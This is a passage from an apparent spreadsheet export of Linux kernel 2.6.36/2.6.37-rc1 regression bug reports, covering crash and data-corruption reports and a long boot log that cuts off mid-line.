    <t>Subject : 2.6.37-rc1: NULL pointer dereference Submitter : Chris Clayton &lt;chris2553@googlemail.com&gt; Date : 2010-11-01 17:14 Message-ID : 201011011714.51260.chris2553@googlemail.com References : http://marc.info/?l=linux-kernel&amp;m=128863172203773&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.36 BUG: scheduling while atomic: rc.sysinit/1376/0x00000002</t>
  </si>
  <si>
    <t>2010-11-07 08:18 UTC</t>
  </si>
  <si>
    <t>2010-11-16 18:27 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.36 BUG: scheduling while atomic: rc.sysinit/1376/0x00000002 Submitter : Mathias Burén &lt;mathias.buren@gmail.com&gt; Date : 2010-11-01 18:39 Message-ID : AANLkTi=kkW7ruOVp7mPsMDWRRkL2CqrOJCyZqxj_Vekm@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=128863676810517&amp;w=2 This entry is being used for tracking a regression from 2.6.35. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>data corruption after mmap()ing a file and writev() some data to another file</t>
  </si>
  <si>
    <t>2010-11-08 10:33 UTC</t>
  </si>
  <si>
    <t>2010-12-05 19:57 UTC</t>
  </si>
  <si>
    <t>Created attachment 36732 [details] map-test.c mmap() a file and writev() back to another file Hi there, we experienced some serious database corruptions in cyrus imap after switching to the latest stable kernel (2.6.36). we traced this down to some mmap()ing and writev() afterwards. Donald Buczek wrote a small test-program to reproduce this (.c-file attached) to reproduce the corruption please compile map-test.c and run: echo -n "cccccccccc"&gt;test.flat ./map-test xxd test.flat.NEW how we built the xfs and mounted it: mkfs.xfs /dev/sda3 mount /dev/sda3 /mnt example output under XFS: (/dev/sda3 /mnt xfs rw,relatime,attr2,noquota) 0000000: 0000 0000 0000 0000 0000 0000 0000 0000 ................ 0000010: 0000 0000 6363 6363 6363 6363 6363 ....cccccccccc example output under reiserfs: 0000000: 6161 6161 6161 6161 6161 6262 6262 6262 aaaaaaaaaabbbbbb 0000010: 6262 6262 6363 6363 6363 6363 6363 bbbbcccccccccc please let me know what else to provide to make reproducing this bug easier.. we downgraded to linux 2.6.35.8 and everything seems to be fine again. regards, marius tolzmann</t>
  </si>
  <si>
    <t>2.6.37-rc1 boot Problem - BUG: unable to handle kernel null pointer - dmesg und config Datei</t>
  </si>
  <si>
    <t>2010-11-09 20:18 UTC</t>
  </si>
  <si>
    <t>2010-12-02 20:49 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.37-rc1 boot Problem - BUG: unable to handle kernel null pointer - dmesg und config Datei Submitter : "werner" &lt;w.landgraf@ru.ru&gt; Date : 2010-11-02 2:09 Message-ID : web-395697375@zbackend1.aha.ru References : http://marc.info/?l=linux-kernel&amp;m=128866380110940&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>2.6.37-rc1: BUG: scheduling while atomic (kvm_init)</t>
  </si>
  <si>
    <t>2010-11-09 20:23 UTC</t>
  </si>
  <si>
    <t>2010-12-19 11:47 UTC</t>
  </si>
  <si>
    <t>Subject : 2.6.37-rc1: BUG: scheduling while atomic (kvm_init) Submitter : "Thomas Meyer" &lt;thomas@m3y3r.de&gt; Date : 2010-11-02 19:06 Message-ID : 50AA24C585B14210A44AB599605C7CBD@hugo References : http://marc.info/?l=linux-kernel&amp;m=128872479921559&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Linux 2.6.37-rc1 (acpi_video)</t>
  </si>
  <si>
    <t>2010-11-09 20:45 UTC</t>
  </si>
  <si>
    <t>2010-12-06 21:57 UTC</t>
  </si>
  <si>
    <t>Subject : Linux 2.6.37-rc1 (acpi_video) Submitter : Randy Dunlap &lt;randy.dunlap@oracle.com&gt; Date : 2010-11-02 18:51 Message-ID : 20101102115106.bac57d21.randy.dunlap@oracle.com References : http://marc.info/?l=linux-kernel&amp;m=128872403920449&amp;w=2 This entry is being used for tracking a regression from 2.6.36. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Oops while unmounting an USB key with a FAT filesystem</t>
  </si>
  <si>
    <t>2010-11-10 08:57 UTC</t>
  </si>
  <si>
    <t>2013-11-18 17:55 UTC</t>
  </si>
  <si>
    <t>Created attachment 37032 [details] Part of the syslog with the Oops trace System Debian GNU/Linux x86_64 Processor Athlon 64 II, 4GB DDR3 Hi, I've an USB key with a FAT filesystem. What happenend: - mounted the key - modified a file on the key - unmounted the key - got the Oops Attached the related part of the syslog and .config Regards Jean-Luc</t>
  </si>
  <si>
    <t>divide error in select_task_rq_fair()</t>
  </si>
  <si>
    <t>Upstream (2.6.37-rc1)</t>
  </si>
  <si>
    <t>2010-11-10 23:58 UTC</t>
  </si>
  <si>
    <t>2011-02-02 23:40 UTC</t>
  </si>
  <si>
    <t>With current upstream, Bjorn Helgaas encountered the following crash at boot-time: Brought up 64 CPUs Total of 64 processors activated (289366.52 BogoMIPS). divide error: 0000 [#1] SMP last sysfs file: CPU 1 Modules linked in: Pid: 2, comm: kthreadd Not tainted 2.6.37-rc1-00027-gff8b16d #271 /ProLiant DL980 G7 RIP: 0010:[&lt;ffffffff81034645&gt;] [&lt;ffffffff81034645&gt;] select_task_rq_fair+0x62a/0x7a0 Complete dmesg below; let me know if you need more info. Bjorn [ 0.000000] Initializing cgroup subsys cpuset [ 0.000000] Initializing cgroup subsys cpu [ 0.000000] Linux version 2.6.37-rc1-00027-gff8b16d (helgaas@bob) (gcc version 4.3.2 (Debian 4.3.2-1.1) ) #271 SMP Wed Nov 3 19:18:12 MDT 2010 [ 0.000000] Command line: console=ttyS0,115200n8 ignore_loglevel printk.time=0 root=/dev/cciss/c0d1p1 BOOT_IMAGE=kernel [ 0.000000] BIOS-provided physical RAM map: [ 0.000000] BIOS-e820: 0000000000000000 - 0000000000095400 (usable) [ 0.000000] BIOS-e820: 0000000000095400 - 00000000000a0000 (reserved) [ 0.000000] BIOS-e820: 00000000000f0000 - 0000000000100000 (reserved) [ 0.000000] BIOS-e820: 0000000000100000 - 000000007f600000 (usable) [ 0.000000] BIOS-e820: 000000007f600000 - 000000007f62c000 (ACPI data) [ 0.000000] BIOS-e820: 000000007f62c000 - 000000007f62d000 (usable) [ 0.000000] BIOS-e820: 000000007f62d000 - 000000007f79d000 (reserved) [ 0.000000] BIOS-e820: 000000007f79d000 - 000000007f7a0000 (ACPI data) [ 0.000000] BIOS-e820: 000000007f7a0000 - 0000000090000000 (reserved) [ 0.000000] BIOS-e820: 00000000fec00000 - 00000000fee10000 (reserved) [ 0.000000] BIOS-e820: 00000000ff800000 - 0000000100000000 (reserved) [ 0.000000] BIOS-e820: 0000000100000000 - 0000000480000000 (usable) [ 0.000000] BIOS-e820: 0000002000000000 - 0000002400000000 (usable) [ 0.000000] BIOS-e820: 0000004000000000 - 0000004400000000 (usable) [ 0.000000] BIOS-e820: 0000006000000000 - 0000006400000000 (usable) [ 0.000000] BIOS-e820: 0000008000000000 - 0000008200000000 (usable) [ 0.000000] BIOS-e820: 000000a000000000 - 000000a200000000 (usable) [ 0.000000] BIOS-e820: 000000c000000000 - 000000c200000000 (usable) [ 0.000000] BIOS-e820: 000000e000000000 - 000000e200000000 (usable) [ 0.000000] debug: ignoring loglevel setting. [ 0.000000] NX (Execute Disable) protection: active [ 0.000000] DMI 2.6 present. [ 0.000000] DMI: /ProLiant DL980 G7, BIOS P66 07/07/2010 [ 0.000000] e820 update range: 0000000000000000 - 0000000000010000 (usable) ==&gt; (reserved) [ 0.000000] e820 remove range: 00000000000a0000 - 0000000000100000 (usable) [ 0.000000] No AGP bridge found [ 0.000000] last_pfn = 0xe200000 max_arch_pfn = 0x400000000 [ 0.000000] MTRR default type: write-back [ 0.000000] MTRR fixed ranges enabled: [ 0.000000] 00000-9FFFF write-back [ 0.000000] A0000-BFFFF uncachable [ 0.000000] C0000-FFFFF write-protect [ 0.000000] MTRR variable ranges enabled: [ 0.000000] 0 base 00080000000 mask FFF80000000 uncachable [ 0.000000] 1 disabled [ 0.000000] 2 disabled [ 0.000000] 3 disabled [ 0.000000] 4 disabled [ 0.000000] 5 disabled [ 0.000000] 6 disabled [ 0.000000] 7 disabled [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106 [ 0.000000] last_pfn = 0x7f62d max_arch_pfn = 0x400000000 [ 0.000000] found SMP MP-table at [ffff8800000f4f80] f4f80 [ 0.000000] Scanning 0 areas for low memory corruption [ 0.000000] initial memory mapped : 0 - 20000000 [ 0.000000] init_memory_mapping: 0000000000000000-000000007f62d000 [ 0.000000] 0000000000 - 007f600000 page 2M [ 0.000000] 007f600000 - 007f62d000 page 4k [ 0.000000] kernel direct mapping tables up to 7f62d000 @ 1fffc000-20000000 [ 0.000000] init_memory_mapping: 0000000100000000-000000e200000000 [ 0.000000] 0100000000 - e200000000 page 2M [ 0.000000] kernel direct mapping tables up to e200000000 @ 7f276000-7f600000 [ 0.000000] ACPI: RSDP 00000000000f4f00 00024 (v02 HP ) [ 0.000000] ACPI: XSDT 000000007f6022c0 000C4 (v01 HP ProLiant 00000002 Ò? 0000162E) [ 0.000000] ACPI: FACP 000000007f6023c0 000F4 (v03 HP ProLiant 00000002 Ò? 0000162E) [ 0.000000] ACPI Warning: Invalid length for Pm1aControlBlock: 32, using default 16 (20101013/tbfadt-607) [ 0.000000] ACPI: DSDT 000000007f6024c0 029E0 (v01 HP DSDT 00000001 INTL 20030228) [ 0.000000] ACPI: FACS 000000007f600140 00040 [ 0.000000] ACPI: SPCR 000000007f600180 00050 (v01 HP SPCRRBSU 00000001 Ò? 0000162E) [ 0.000000] ACPI: MCFG 000000007f600200 0003C (v01 HP ProLiant 00000001 00000000) [ 0.000000] ACPI: HPET 000000007f600240 00038 (v01 HP ProLiant 00000002 Ò? 0000162E) [ 0.000000] ACPI: FFFF 000000007f600280 00064 (v02 HP ProLiant 00000002 Ò? 0000162E) [ 0.000000] ACPI: SPMI 000000007f600300 00040 (v05 HP ProLiant 00000001 Ò? 0000162E) [ 0.000000] ACPI: ERST 000000007f600340 001D0 (v01 HP ProLiant 00000001 Ò? 0000162E) [ 0.000000] ACPI: APIC 000000007f600540 00476 (v01 HP ProLiant 00000002 00000000) [ 0.000000] ACPI: SRAT 000000007f6009c0 012B0 (v01 HP Proliant 00000001 Ò? 0000162E) [ 0.000000] ACPI: FFFF 000000007f601c80 00176 (v01 HP ProLiant 00000001 Ò? 0000162E) [ 0.000000] ACPI: BERT 000000007f601e00 00030 (v01 HP ProLiant 00000001 Ò? 0000162E) [ 0.000000] ACPI: HEST 000000007f601e40 000BC (v01 HP ProLiant 00000001 Ò? 0000162E) [ 0.000000] ACPI: DMAR 000000007f601f00 00224 (v01 HP ProLiant 00000001 Ò? 0000162E) [ 0.000000] ACPI: SLIT 000000007f602240 0006C (v01 HP ProLiant 00000001 00000000) [ 0.000000] ACPI: SSDT 000000007f604ea0 00CD4 (v01 HP SSDT1 00000001 INTL 20090625) [ 0.000000] ACPI: SSDT 000000007f605b80 00125 (v03 HP CRSPCI0 00000002 HP 00000001) [ 0.000000] ACPI: SSDT 000000007f605cc0 00076 (v03 HP CRSPCI1 00000002 HP 00000001) [ 0.000000] ACPI: SSDT 000000007f605d40 00D7B (v01 HP pcc 00000001 INTL 20090625) [ 0.000000] ACPI: SSDT 000000007f606ac0 00377 (v01 HP pmab 00000001 INTL 20090625) [ 0.000000] ACPI: SSDT 000000007f606e40 13824 (v01 INTEL PPM RCM 80000001 INTL 20061109) [ 0.000000] ACPI: Local APIC address 0xfee00000 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x00 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x01 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x02 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x03 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x04 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x05 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x06 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x07 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x10 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x11 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x12 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x13 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x14 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x15 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x16 -&gt; Node 0 [ 0.000000] SRAT: PXM 0 -&gt; APIC 0x17 -&gt; Node 0 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x20 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x21 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x22 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x23 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x24 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x25 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x26 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x27 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x30 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x31 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x32 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x33 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x34 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x35 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x36 -&gt; Node 1 [ 0.000000] SRAT: PXM 1 -&gt; APIC 0x37 -&gt; Node 1 [ 0.000000] ACPI: [SRAT:0x00] ignored 192 entries of 256 found [ 0.000000] SRAT: Node 0 PXM 0 0-80000000 [ 0.000000] SRAT: Node 0 PXM 0 100000000-480000000 [ 0.000000] SRAT: Node 1 PXM 1 2000000000-2400000000 [ 0.000000] SRAT: Node 2 PXM 2 4000000000-4400000000 [ 0.000000] SRAT: Node 3 PXM 3 6000000000-6400000000 [ 0.000000] SRAT: Node 4 PXM 4 8000000000-8200000000 [ 0.000000] SRAT: Node 5 PXM 5 a000000000-a200000000 [ 0.000000] SRAT: Node 6 PXM 6 c000000000-c200000000 [ 0.000000] SRAT: Node 7 PXM 7 e000000000-e200000000 [ 0.000000] SRAT: Node 0 [0,80000000) + [100000000,480000000) -&gt; [0,480000000) [ 0.000000] NUMA: Using 37 for the hash shift. [ 0.000000] Initmem setup node 0 0000000000000000-0000000480000000 [ 0.000000] NODE_DATA [000000047fffb000 - 000000047fffffff] [ 0.000000] Initmem setup node 1 0000002000000000-0000002400000000 [ 0.000000] NODE_DATA [00000023ffffb000 - 00000023ffffffff] [ 0.000000] Initmem setup node 2 0000004000000000-0000004400000000 [ 0.000000] NODE_DATA [00000043ffffb000 - 00000043ffffffff] [ 0.000000] Initmem setup node 3 0000006000000000-0000006400000000 [ 0.000000] NODE_DATA [00000063ffffb000 - 00000063ffffffff] [ 0.000000] Initmem setup node 4 0000008000000000-0000008200000000 [ 0.000000] NODE_DATA [00000081ffffb000 - 00000081ffffffff] [ 0.000000] Initmem setup node 5 000000a000000000-000000a200000000 [ 0.000000] NODE_DATA [000000a1ffffb000 - 000000a1ffffffff] [ 0.000000] Initmem setup node 6 000000c000000000-000000c200000000 [ 0.000000] NODE_DATA [000000c1ffffb000 - 000000c1ffffffff] [ 0.000000] Initmem setup node 7 000000e000000000-000000e200000000 [ 0.000000] NODE_DATA [000000e1ffffa000 - 000000e1ffffefff] [ 0.000000] [ffffea0000000000-ffffea000fbfffff] PMD -&gt; [ffff88046fe00000-ffff88047ddfffff] on node 0 [ 0.000000] [ffffea0070000000-ffffea007dffffff] PMD -&gt; [ffff8823efe00000-ffff8823fddfffff] on node 1 [ 0.000000] [ffffea00e0000000-ffffea00edffffff] PMD -&gt; [ffff8843efe00000-ffff8843fddfffff] on node 2 [ 0.000000] [ffffea0150000000-ffffea015dffffff] PMD -&gt; [ffff8863efe00000-ffff8863fddfffff] on node 3 [ 0.000000] [ffffea01c0000000-ffffea01c6ffffff] PMD -&gt; [ffff8881f7e00000-ffff8881fedfffff] on node 4 [ 0.000000] [ffffea0230000000-ffffea0236ffffff] PMD -&gt; [ffff88a1f7e00000-ffff88a1fedfffff] on node 5 [ 0.000000] [ffffea02a0000000-ffffea02a6ffffff] PMD -&gt; [ffff88c1f7e00000-ffff88c1fedfffff] on node 6 [ 0.000000] [ffffea0310000000-ffffea0316ffffff] PMD -&gt; [ffff88e1f7e00000-ffff88e1fedfffff] on node 7 [ 0.000000] Zone PFN ranges: [ 0.000000] DMA 0x00000010 -&gt; 0x00001000 [ 0.000000] DMA32 0x00001000 -&gt; 0x00100000 [ 0.000000] Normal 0x00100000 -&gt; 0x0e200000 [ 0.000000] Movable zone start PFN for each node [ 0.000000] early_node_map[11] active PFN ranges [ 0.000000] 0: 0x00000010 -&gt; 0x00000095 [ 0.000000] 0: 0x00000100 -&gt; 0x0007f600 [ 0.000000] 0: 0x0007f62c -&gt; 0x0007f62d [ 0.000000] 0: 0x00100000 -&gt; 0x00480000 [ 0.000000] 1: 0x02000000 -&gt; 0x02400000 [ 0.000000] 2: 0x04000000 -&gt; 0x04400000 [ 0.000000] 3: 0x06000000 -&gt; 0x06400000 [ 0.000000] 4: 0x08000000 -&gt; 0x08200000 [ 0.000000] 5: 0x0a000000 -&gt; 0x0a200000 [ 0.000000] 6: 0x0c000000 -&gt; 0x0c200000 [ 0.000000] 7: 0x0e000000 -&gt; 0x0e200000 [ 0.000000] On node 0 totalpages: 4191622 [ 0.000000] DMA zone: 56 pages used for memmap [ 0.000000] DMA zone: 6 pages reserved [ 0.000000] DMA zone: 3911 pages, LIFO batch:0 [ 0.000000] DMA32 zone: 14280 pages used for memmap [ 0.000000] DMA32 zone: 503353 pages, LIFO batch:31 [ 0.000000] Normal zone: 50176 pages used for memmap [ 0.000000] Normal zone: 3619840 pages, LIFO batch:31 [ 0.000000] On node 1 totalpages: 4194304 [ 0.000000] Normal zone: 57344 pages used for memmap [ 0.000000] Normal zone: 4136960 pages, LIFO batch:31 [ 0.000000] On node 2 totalpages: 4194304 [ 0.000000] Normal zone: 57344 pages used for memmap [ 0.000000] Normal zone: 4136960 pages, LIFO batch:31 [ 0.000000] On node 3 totalpages: 4194304 [ 0.000000] Normal zone: 57344 pages used for memmap [ 0.000000] Normal zone: 4136960 pages, LIFO batch:31 [ 0.000000] On node 4 totalpages: 2097152 [ 0.000000] Normal zone: 28672 pages used for memmap [ 0.000000] Normal zone: 2068480 pages, LIFO batch:31 [ 0.000000] On node 5 totalpages: 2097152 [ 0.000000] Normal zone: 28672 pages used for memmap [ 0.000000] Normal zone: 2068480 pages, LIFO batch:31 [ 0.000000] On node 6 totalpages: 2097152 [ 0.000000] Normal zone: 28672 pages used for memmap [ 0.000000] Normal zone: 2068480 pages, LIFO batch:31 [ 0.000000] On node 7 totalpages: 2097152 [ 0.000000] Normal zone: 28672 pages used for memmap [ 0.000000] Normal zone: 2068480 pages, LIFO batch:31 [ 0.000000] ACPI: PM-Timer IO Port: 0x908 [ 0.000000] ACPI: Local APIC address 0xfee00000 [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x02] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x04] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x06] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x10] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x12] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x14] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x16] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x10] lapic_id[0x20] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x12] lapic_id[0x22] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x14] lapic_id[0x24] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x16] lapic_id[0x26] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x18] lapic_id[0x30] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x1a] lapic_id[0x32] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x1c] lapic_id[0x34] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x1e] lapic_id[0x36] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x20] lapic_id[0x40] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x22] lapic_id[0x42] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x24] lapic_id[0x44] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x26] lapic_id[0x46] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x28] lapic_id[0x50] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x2a] lapic_id[0x52] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x2c] lapic_id[0x54] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x2e] lapic_id[0x56] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x30] lapic_id[0x60] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x32] lapic_id[0x62] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x34] lapic_id[0x64] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x36] lapic_id[0x66] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x38] lapic_id[0x70] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x3a] lapic_id[0x72] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x3c] lapic_id[0x74] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x3e] lapic_id[0x76] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x40] lapic_id[0x80] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x42] lapic_id[0x82] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x44] lapic_id[0x84] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x46] lapic_id[0x86] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x48] lapic_id[0x90] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x4a] lapic_id[0x92] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x4c] lapic_id[0x94] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x4e] lapic_id[0x96] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x50] lapic_id[0xa0] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x52] lapic_id[0xa2] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x54] lapic_id[0xa4] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x56] lapic_id[0xa6] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x58] lapic_id[0xb0] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x5a] lapic_id[0xb2] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x5c] lapic_id[0xb4] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x5e] lapic_id[0xb6] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x60] lapic_id[0xc0] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x62] lapic_id[0xc2] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x64] lapic_id[0xc4] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x66] lapic_id[0xc6] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x68] lapic_id[0xd0] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x6a] lapic_id[0xd2] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x6c] lapic_id[0xd4] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x6e] lapic_id[0xd6] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x70] lapic_id[0xe0] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x72] lapic_id[0xe2] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x74] lapic_id[0xe4] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x76] lapic_id[0xe6] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x78] lapic_id[0xf0] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x7a] lapic_id[0xf2] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x7c] lapic_id[0xf4] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x7e] lapic_id[0xf6] enabled) [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x01] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 64/0x1 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x03] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 65/0x3 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x05] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 66/0x5 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x07] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 67/0x7 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x11] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 68/0x11 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x13] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 69/0x13 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x15] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 70/0x15 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x0f] lapic_id[0x17] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 71/0x17 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x11] lapic_id[0x21] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 72/0x21 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x13] lapic_id[0x23] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 73/0x23 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x15] lapic_id[0x25] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 74/0x25 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x17] lapic_id[0x27] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 75/0x27 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x19] lapic_id[0x31] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 76/0x31 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x1b] lapic_id[0x33] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 77/0x33 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x1d] lapic_id[0x35] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 78/0x35 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x1f] lapic_id[0x37] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 79/0x37 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x21] lapic_id[0x41] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 80/0x41 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x23] lapic_id[0x43] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 81/0x43 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x25] lapic_id[0x45] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 82/0x45 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x27] lapic_id[0x47] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 83/0x47 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x29] lapic_id[0x51] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 84/0x51 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x2b] lapic_id[0x53] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 85/0x53 ignored. [ 0.000000] ACPI: LAPIC (acpi_id[0x2d] lapic_id[0x55] enabled) [ 0.000000] ACPI: NR_CPUS/possible_cpus limit of 64 reached. Processor 86/0x55 